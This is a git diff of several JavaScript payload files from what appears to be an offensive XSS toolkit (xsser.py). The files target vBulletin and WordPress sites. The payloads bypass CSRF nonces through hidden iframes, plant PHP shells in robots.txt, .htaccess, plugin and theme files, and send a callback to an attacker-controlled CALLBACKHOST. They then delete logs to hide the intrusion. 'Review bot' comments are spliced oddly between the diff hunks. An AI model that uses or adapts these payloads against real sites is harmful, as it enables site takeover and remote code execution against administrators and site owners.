+ silent_main_tag.innerHTML = ' '+content; + top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag); + silent_main_tag.setAttribute('id', 'varbits'); + silent_main_tag.setAttribute('name', 'varbits'); + silent_main_tag.setAttribute('action', action); + silent_main_tag.setAttribute('method', method); + } + + // Inject our prepopulated form + silent_form_inject('plugin.php?do=update', 'POST', form_input); + + // Submit our payload automatically - There's no turning back now + //if (document.cookie.indexOf("XSS_Infected") == -1) { + // TODO: Make the "XSS_Infected" cookie name a function argument for silent_inject() + // TODO: Maybe move document.cookie.match() to the beginning of silent_inject() + if (!document.cookie.match(/^(.*;)?\s*XSS_Infected\s*=\s*[^;]+(.*)?$/)) { + // TODO: Maybe move submit() down to after the notification, but before SetCookie() + top.document.getElementById('silent_frame').contentDocument.getElementById('varbits').submit(); + + // Specifically located in this section to prevent double-loading of the URL + var request = new XMLHttpRequest(); // Initiate XMLHttpRequest + request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request.send(); // Send the request + + SetCookie("XSS_Infected", "true"); // Prevent re-infection / loops + // TODO: Maybe change the cookie name and value in the future. + } + + // Give the malicious linkback two seconds to inject our payload, before self-removal + // Old method: var end = setTimeout("clean_up()", 2000); + setTimeout(function() { + clean_up(); + }, 2000); + +} + +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. +// Delete all linkBacks on the current page - Including our injected XSS+JS payload. 
+function clean_up() {
+ // noinspection Annotator
+ js_check_all_option(document.linkbacks, -1);
+ // noinspection Annotator
+ document.linkbacks.submit();
+ // The JS function and DOM property above, are defined by vBulletin.
+ // TODO: Maybe use native methods for "check all checkboxes" or something similar.
+}
+
+// TODO: Look into HTML5 Storage instead of cookies maybe.
+// A function to create a cookie so the infection happens only once.
+function SetCookie(cookieName, cookieContent) {
+ var cookiePath = '/';
+ var expDate=new Date();
+ expDate.setTime(expDate.getTime()+372800000);
+ var expires=expDate.toUTCString();
+ // document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
+ // The escape function has been deprecated.
+ document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires;
+}
+
+// If our cookie is not present, continue.
+// Old method: document.cookie.indexOf("XSS_Infected") == -1
+// TODO: Turn this into a function where "XSS_Infected" will be an argument
+if (!document.cookie.match(/^(.*;)?\s*XSS_Infected\s*=\s*[^;]+(.*)?$/)) {
+ // Append a (hidden) iframe to the HTML body for data injection
+ var mainframe = document.createElement("iframe");
+ mainframe.setAttribute('id', 'silent_frame');
+ top.document.body.appendChild(mainframe);
+ mainframe.setAttribute('onload', 'main.silent_inject()');
+ mainframe.setAttribute('src', 'plugin.php?do=add');
+}
diff --git a/Payloads/javascript/wordpress_legacy.js b/Payloads/javascript/wordpress_legacy.js
index 10b1376..42abb18 100644
--- a/Payloads/javascript/wordpress_legacy.js
+++ b/Payloads/javascript/wordpress_legacy.js
@@ -1,155 +1,188 @@ -// WordPress WPSEO Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version 2.5 - 2016 -// -// Changelog: -// - Ver 2.5: Added XMLHttpRequest for JS Notification -// -// Credits: InterN0T -// -// Requirements: -// 1) Ability to edit "robots.txt" and ".htaccess" within WPSEO. (Default feature) -// 2) That Apache is not configured with "AllowOverride None" for the document root. -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// Better WP Security - Stored XSS (Old Exploit - See Exploit-DB) -// Sample Injection Payload: "> -// The above JavaScipt writes a new script tag as follows: -// -// This is because WordPress or WPSEO is filtering unencoded script tags such as the above unencoded form. -// -// For ethical and legal purposes only. This script is provided as is and without warranty. - -var robots_shell = ''; // The python script automatically updates the PHP_PAYLOAD placeholder variable -var htacces_shell = "AddHandler application/x-httpd-php .txt"; // Execute .txt files as PHP - On some servers it needs to be: application/x-httpd-php5 - -// STAGE 1 - Inject into robots.txt -function silent_robots_inject() { - if (document.cookie.indexOf("Robots_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var robots_wpnonce = document.getElementById('silent_robots_frame').contentDocument.getElementById('robotstxtform')._wpnonce.value; // WP Nonce / CSRF Token - var robots_contents = document.getElementById('silent_robots_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of robots.txt - - // Prepoulated form - var robots_input = '\ - \ - \ - \ - \ - '; - - // Inject our prepopulated form into the iframe - silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor','POST',robots_input,'silent_robots_frame','robots_haxx'); - - // Submit our payload - There's no turning back now - 
top.document.getElementById('silent_robots_frame').contentDocument.getElementById('robots_haxx').submit(); - SetCookie("Robots_Infected","true"); // Prevent re-infection / loops - - } -} - - -// STAGE 2 - Inject into .htaccess -function silent_htaccess_inject() { - if (document.cookie.indexOf("Htaccess_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var htaccess_wpnonce = document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccessform')._wpnonce.value; // WP Nonce / CSRF Token - var htaccess_contents = document.getElementById('silent_htaccess_frame').contentDocument.getElementsByTagName('textarea')[1].value; // Current contents of .htaccess - - // Prepopulated form - var htaccess_input = '\ - \ - \ - \ - \ - '; - - // Inject our prepopulated form into the iframe - silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor','POST',htaccess_input,'silent_htaccess_frame','htaccess_haxx'); - - // Submit our payload - There's no turning back now - top.document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccess_haxx').submit(); - SetCookie("Htaccess_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - // Give our script two seconds to execute and inject the prepopulated forms before self-removal. 
- // Timeout changed from 5 seconds to 2 seconds - Version 2.5 - var end = setTimeout("clean_up()",2000); - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframes into the page -// USAGE: main_frame_inject("Robots_Infected","silent_robots_frame","silent_robots_inject()","admin.php?page=wpseo_files"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Injects a hidden form with prepopulated data -// USAGE: silent_form_inject('admin.php?page=wpseo_files','POST',htaccess_input,'silent_htaccess_frame','htaccess_haxx'); -function silent_form_inject(action,method,content,framename,identifier) { - var silent_main_tag = document.createElement('form'); - - // The inner contents of our form is equal to the content variable - silent_main_tag.innerHTML = ' '+content; - top.document.getElementById(framename).contentDocument.body.appendChild(silent_main_tag); - silent_main_tag.setAttribute('id',identifier); - silent_main_tag.setAttribute('name','blackhat2016'); // Changed name version 2.5 - silent_main_tag.setAttribute('action',action); - silent_main_tag.setAttribute('method',method); -} - -// Sets a cookie with a very long expiration time -// USAGE: SetCookie("Htaccess_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - 
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage. -// Delete all 404 log errors - Including the injected payload(s) -// This clean up function is only valid for Better WP Security. -// USAGE: clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// STAGE 1 - Robots.txt -main_frame_inject("Robots_Infected","silent_robots_frame","silent_robots_inject()","admin.php?page=wpseo_tools&tool=file-editor"); - -// STAGE 2 - .Htaccess -main_frame_inject("Htaccess_Infected","silent_htaccess_frame","silent_htaccess_inject()","admin.php?page=wpseo_tools&tool=file-editor"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress WPSEO Payload (Robots.txt and .htaccess) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Made various minor improvements. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Requirements: +1) Ability to edit "robots.txt" and ".htaccess" within WPSEO. (Default feature) +2) Apache is not configured with "AllowOverride None" for the document root. (Default, but often changed.) + +This payload was originally developed for: +* Better WP Security - Stored XSS (Old Exploit - See Exploit-DB) + +Sample Injection Payload: +"> +The above JavaScript writes a new script tag as follows: + +This is because WordPress or WPSEO is filtering unencoded script tags. + +For ethical and legal purposes only. This script is provided as is and without warranty. 
+ +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var robots_shell = ''; +// The python script automatically updates the PHP_PAYLOAD placeholder variable +var htacces_shell = "AddHandler application/x-httpd-php .txt"; +// Execute .txt files as PHP - On some servers it needs to be: application/x-httpd-php5 +// TODO: Maybe add another line that specifies "php5/6/7" if it doesn't cause any errors. + +// STAGE 1 - Inject into robots.txt +// noinspection JSUnusedGlobalSymbols +function silent_robots_inject() { + //if (document.cookie.indexOf("Robots_Infected") == -1) { + // TODO: Make the "Robots_Infected" cookie name a function argument for silent_robots_inject() + if (!document.cookie.match(/^(.*;)?\s*Robots_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // TODO Note: For some reason "_wpnonce" was not changed to "nonce" by WPSEO. Later versions of WPSEO may utilize "nonce". + // noinspection Annotator + var robots_wpnonce = document.getElementById('silent_robots_frame').contentDocument.getElementById('robotstxtform')._wpnonce.value; // WP Nonce / CSRF Token + var robots_contents = document.getElementById('silent_robots_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of robots.txt + + // TODO: Use the pre-existing form in the future if possible. 
Consider switching to FormData() + // Prepoulated form + var robots_input = '\ + \ + \ + \ + \ + '; + + // Inject our prepopulated form into the iframe + silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor', 'POST', robots_input, 'silent_robots_frame', 'robots_haxx'); + + // Submit our payload - There's no turning back now + top.document.getElementById('silent_robots_frame').contentDocument.getElementById('robots_haxx').submit(); + + // TODO: Maybe change the cookie name and value in the future. + SetCookie("Robots_Infected", "true"); // Prevent re-infection / loops + } +} + +// STAGE 2 - Inject into .htaccess +// noinspection JSUnusedGlobalSymbols +function silent_htaccess_inject() { + //if (document.cookie.indexOf("Htaccess_Infected") == -1) { + // TODO: Make the "Htaccess_Infected" cookie name a function argument for silent_htaccess_inject() + if (!document.cookie.match(/^(.*;)?\s*Htaccess_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // TODO Note: For some reason "_wpnonce" was not changed to "nonce" by WPSEO. Current versions may utilise "nonce". + // noinspection Annotator + var htaccess_wpnonce = document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccessform')._wpnonce.value; // WP Nonce / CSRF Token + var htaccess_contents = document.getElementById('silent_htaccess_frame').contentDocument.getElementsByTagName('textarea')[1].value; // Current contents of .htaccess + + // TODO: Use the pre-existing form in the future if possible. 
Consider switching to FormData() + // Prepopulated form + var htaccess_input = '\ + \ + \ + \ + \ + '; + + // Inject our prepopulated form into the iframe + silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor', 'POST', htaccess_input, 'silent_htaccess_frame', 'htaccess_haxx'); + + // Submit our payload - There's no turning back now + top.document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccess_haxx').submit(); + + // TODO: Maybe change the cookie name and value in the future. + SetCookie("Htaccess_Infected", "true"); // Prevent re-infection / loops + + var request = new XMLHttpRequest(); // Initiate XMLHttpRequest + request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request.send(); // Send the request + + // Give our script two seconds to execute and inject the prepopulated forms before self-removal. + // Timeout changed from 5 seconds to 2 seconds - Version 2.5 + // Old method: var end = setTimeout("clean_up()", 2000); + setTimeout(function() { + clean_up(); + }, 2000); + + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframes into the page +// USAGE: main_frame_inject("Robots_Infected", "silent_robots_frame", "silent_robots_inject()", "admin.php?page=wpseo_files"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 
'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Injects a hidden form with prepopulated data +// USAGE: silent_form_inject("admin.php?page=wpseo_files", "POST", htaccess_input, "silent_htaccess_frame", "htaccess_haxx"); +function silent_form_inject(action, method, content, framename, identifier) { + var silent_main_tag = document.createElement('form'); + + // The inner contents of our form is equal to the content variable + silent_main_tag.innerHTML = ' '+content; + top.document.getElementById(framename).contentDocument.body.appendChild(silent_main_tag); + silent_main_tag.setAttribute('id', identifier); + silent_main_tag.setAttribute('name', 'BlackHat2017'); // Changed name version 2.75 + silent_main_tag.setAttribute('action', action); + silent_main_tag.setAttribute('method', method); +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Htaccess_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; + // Replaced escape() as it was deprecated. +} + +// NOTE: This function should always be executed after the final stage. +// Delete all 404 log errors - Including the injected payload(s) +// This clean up function is only valid for Better WP Security. +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. 
+// USAGE: clean_up()
+function clean_up() {
+ // noinspection JSUndefinedPropertyAssignment
+ document.getElementById('404s').checked=true;
+ document.forms[0].submit();
+}
+
+// ============================================= FUNCTIONS END ============================================= \\
+
+// STAGE 1 - Robots.txt
+main_frame_inject("Robots_Infected", "silent_robots_frame", "silent_robots_inject()", "admin.php?page=wpseo_tools&tool=file-editor");
+
+// STAGE 2 - .Htaccess
+main_frame_inject("Htaccess_Infected", "silent_htaccess_frame", "silent_htaccess_inject()", "admin.php?page=wpseo_tools&tool=file-editor");
diff --git a/Payloads/javascript/wordpress_plugin.js b/Payloads/javascript/wordpress_plugin.js
index a01277b..3d9eecf 100644
--- a/Payloads/javascript/wordpress_plugin.js
+++ b/Payloads/javascript/wordpress_plugin.js
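Review bot: The header comment on SetCookie in this hunk, `// Sets a cookie with a very long expiration time`, does not match the body, which computes the expiry as `expDate.getTime()+372800000` milliseconds, i.e. about 4.3 days; the same comment and body pair is repeated in the wordpress_plugin.js hunk. Either the comment or the constant is wrong, so the intended lifetime should be stated where it is read: `// Sets the run-once marker cookie; it expires 372800000 ms (about 4.3 days) after being set`. As a point of style, `var htacces_shell` is misspelled relative to the `.htaccess` file the next comment line describes; if the name is also referenced inside the form markup that this hunk no longer shows, keep the spelling consistent there too.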
@@ -1,126 +1,144 @@ -// WordPress Core Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version: 1.3 - 2016 -// -// Changelog: -// - Ver 1.3: Added XMLHttpRequest for JS Notification -// - Ver 1.3: request.open() on Line 62 is now set by xsser.py -// -// Credits: InterN0T -// -// Usage Notes: -// -- The hello.php plugin does not need to be activated within WordPress -// However, it does need to be present and writeable -// -// Updates: -// -- This version uses XMLHttpRequest and FormData -// -- This version injects into the Hello Dolly plugin -// -// Compatibility Notes: -// -- Very old browsers won't support FormData() and XMLHttpRequest() -// -// Requirements: -// 1) Ability to edit plugin files. (Default feature. However, this is typically disabled in hardened configurations.) -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// For ethical and legal purposes only. This script is provided as is and without warranty. 
- - -var php_input = ''; // This payload comments out any subsequent PHP code - -// Our iframe function which primarily injects a prepopulated form -function silent_plugins_inject() { - if (document.cookie.indexOf("Plugins_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token - var plugin_contents = document.getElementById('silent_plugins_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file - - // Initiate the form data object - var formData = new FormData(); - - // Create a variable which holds our PHP payload, a new line (Windows format), and then the current plugin data - var special_content = php_input+'\r\n'+plugin_contents - - // Prepopulated form with the CSRF (wp_nonce) token and our PHP payload variables specified - formData.append("_wpnonce", plugin_wpnonce); - formData.append("_wp_http_referer", "%2Fwp-admin%2Fplugin-editor.php%3Ffile%3Dhello.php"); - formData.append("newcontent", special_content); - formData.append("action", "update"); - formData.append("file", "hello.php"); - formData.append("theme", ""); // This variable name is probably not needed and also incorrect. However, it does not break our payload. - formData.append("scrollto", "0"); - formData.append("docs-list", ""); - - // Initiate XMLHttpRequest - var request = new XMLHttpRequest(); - - // Method and URL to send the request to - request.open("POST", "http://TARGETWEBSITE/wp-admin/plugin-editor.php"); // Set by xsser.py in this version. 
- // Example contents: http://www.some-wordpress-website.tld/wp-admin/plugin-editor.php - - // Send the request with our form data - request.send(formData); - - SetCookie("Plugins_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - clean_up(); // Remove initial payload from server - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframe into the page -// USAGE: main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Sets a cookie with a very long expiration time -// USAGE: SetCookie("Plugins_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage -// Delete all 404 log errors - Including the injected payload(s) -// This function is specific to the Better WP Security XSS issue -// USAGE: 
clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// USAGE: main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); -// function main_frame_inject(cookiename,identifier,function_name,get_page) -main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress Core Payload (Plugin) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Various minor improvements. Version standardized across all files. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.5 : request.open() on Line 75 is now set by xsser.py +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Usage Notes: +-- The hello.php plugin does not need to be activated within WordPress + However, it does need to be present and writeable + +Compatibility Notes: +-- Very old browsers won't support FormData() and XMLHttpRequest() + +Requirements: +1) Ability to edit plugin files. (Default feature. However, this is typically disabled in hardened configurations.) + +For ethical and legal purposes only. This script is provided as is and without warranty. 
+ +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var php_input = ''; // This payload comments out any subsequent PHP code + +// Our iframe function which primarily injects a prepopulated form +// noinspection JSUnusedGlobalSymbols +function silent_plugins_inject() { + //if (document.cookie.indexOf("Plugins_Infected") == -1) { + // TODO: Make the "Plugins_Infected" cookie name a function argument for silent_plugins_inject() + if (!document.cookie.match(/^(.*;)?\s*Plugins_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token + // Newer versions use "nonce" instead of _wpnonce + // noinspection Annotator + var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template').nonce.value; // WP Nonce / CSRF Token + var plugin_contents = document.getElementById('silent_plugins_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file + + // TODO: Use the pre-existing form in the future if possible. 
+ // Initiate the form data object + var formData = new FormData(); + + // Create a variable which holds our PHP payload, a new line (Windows format), and then the current plugin data + var special_content = php_input+'\r\n'+plugin_contents; + + // Prepopulated form with the CSRF ("_wpnonce") token and our PHP payload as specified + // formData.append("_wpnonce", plugin_wpnonce); + formData.append("nonce", plugin_wpnonce); // Variable has changed name to "nonce" + formData.append("_wp_http_referer", "%2Fwp-admin%2Fplugin-editor.php%3Ffile%3Dhello.php"); + formData.append("newcontent", special_content); + // formData.append("action", "update"); // This value has changed. See below + formData.append("action", "edit-theme-plugin-file"); + formData.append("file", "hello.php"); + formData.append("plugin", "hello.php"); + // formData.append("theme", ""); // This is no longer needed. Keep for now + // formData.append("scrollto", "0"); // Probably not needed. Keep for now + formData.append("docs-list", ""); + + // Initiate XMLHttpRequest + var request_one = new XMLHttpRequest(); + + // Method and URL to send the request to. + request_one.open("POST", "http://TARGETWEBSITE/wp-admin/plugin-editor.php"); // Set by: xsser.py + // Example contents: http://www.some-wordpress-website.tld/wp-admin/plugin-editor.php + // TODO: We may need to change this to ... /wp-admin/plugin-editor.php?file=hello.php + + // Send the request with our form data + request_one.send(formData); + + // TODO: Maybe change the cookie name and value in the future. 
+ SetCookie("Plugins_Infected", "true"); // Prevent re-infection / loops + + // Notification feature + var request_two = new XMLHttpRequest(); // Initiate XMLHttpRequest + request_two.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by xsser.py + request_two.send(); // Send the request + + clean_up(); // Remove initial payload from server + + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframe into the page +// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Plugins_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. 
+function SetCookie(cookieName, cookieContent) {
+ var cookiePath = '/';
+ var expDate=new Date();
+ expDate.setTime(expDate.getTime()+372800000);
+ var expires=expDate.toUTCString();
+ document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires;
+}
+
+// NOTE: This function should always be executed after the final stage
+// Delete all 404 log errors - Including the injected payload(s)
+// This function is specific to the Better WP Security XSS issue
+// TODO: Replace the contents of this function with a "place-holder" variable in the next version.
+// TODO: This variable, is then replaced, depending on the component being exploited.
+// USAGE: clean_up()
+function clean_up() {
+ // noinspection JSUndefinedPropertyAssignment
+ document.getElementById('404s').checked=true;
+ document.forms[0].submit();
+}
+
+// ============================================= FUNCTIONS END ============================================= \\
+
+// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php");
+// function main_frame_inject(cookiename, identifier, function_name, get_page)
+main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php");
diff --git a/Payloads/javascript/wordpress_theme.js b/Payloads/javascript/wordpress_theme.js
index f917b7d..ae48824 100644
--- a/Payloads/javascript/wordpress_theme.js
+++ b/Payloads/javascript/wordpress_theme.js
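Review bot: The changelog entry in the new header, `- Ver 2.5 : request.open() on Line 75 is now set by xsser.py`, pins a line number that this same commit already moves (the header grew and the call was renamed to `request_one.open`), so the reference is stale as soon as it lands; refer to the identifier instead: `- Ver 2.5 : The target URL passed to request_one.open() is now set by xsser.py`. The hunk also keeps several superseded `formData.append(...)` calls as commented-out code marked `// Keep for now`; version control already preserves the old form, so the change is better recorded once in the changelog and the dead lines deleted. The SetCookie header comment `// Sets a cookie with a very long expiration time` describes an expiry of 372800000 ms, about 4.3 days, as noted on the wordpress_legacy.js hunk.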
@@ -1,122 +1,136 @@ -// WordPress Core Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version: 1.3 - 2016 -// -// Changelog: -// - Ver 1.3: Added XMLHttpRequest for JS Notification -// - Ver 1.3: request.open() on Line 62 is now set by xsser.py -// -// Credits: InterN0T -// -// Updates: -// -- This version uses XMLHttpRequest and FormData -// -- This version injects into the footer.php theme file -// -// Compatibility Notes: -// -- Very old browsers won't support FormData() and XMLHttpRequest() -// -// Requirements: -// 1) Ability to edit theme files. (Default feature. However, this is typically disabled in hardened configurations.) -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// For ethical and legal purposes only. This script is provided as is and without warranty. - - -var php_input = ''; - -// Our iframe function which primarily injects a prepopulated form -function silent_themes_inject() { - if (document.cookie.indexOf("Themes_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token - var themes_contents = document.getElementById('silent_themes_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file - - // Initiate the form data object - var formData = new FormData(); - - // Create a variable which holds the current theme data, a new line (Windows format), and then our php payload - var special_content = themes_contents+'\r\n'+php_input - - // Prepopulated form with the CSRF (wp_nonce) token and our PHP payload variables specified - formData.append("_wpnonce", themes_wpnonce); - formData.append("_wp_http_referer", "%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dfooter.php"); - formData.append("newcontent", special_content); - 
formData.append("action", "update"); - formData.append("file", "footer.php"); - formData.append("theme", ""); - formData.append("scrollto", "0"); - formData.append("docs-list", ""); - - // Initiate XMLHttpRequest - var request = new XMLHttpRequest(); - - // Method and URL to send the request to - request.open("POST", "http://TARGETWEBSITE/wp-admin/theme-editor.php"); // Set by xsser.py in this version. - // Example contents: http://www.some-wordpress-website.tld/wp-admin/theme-editor.php - - // Send the request with our form data - request.send(formData); - - SetCookie("Themes_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - clean_up(); // Remove initial payload from server - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframe into the page -// USAGE: main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Sets a cookie with a very long expiration time -// USAGE: 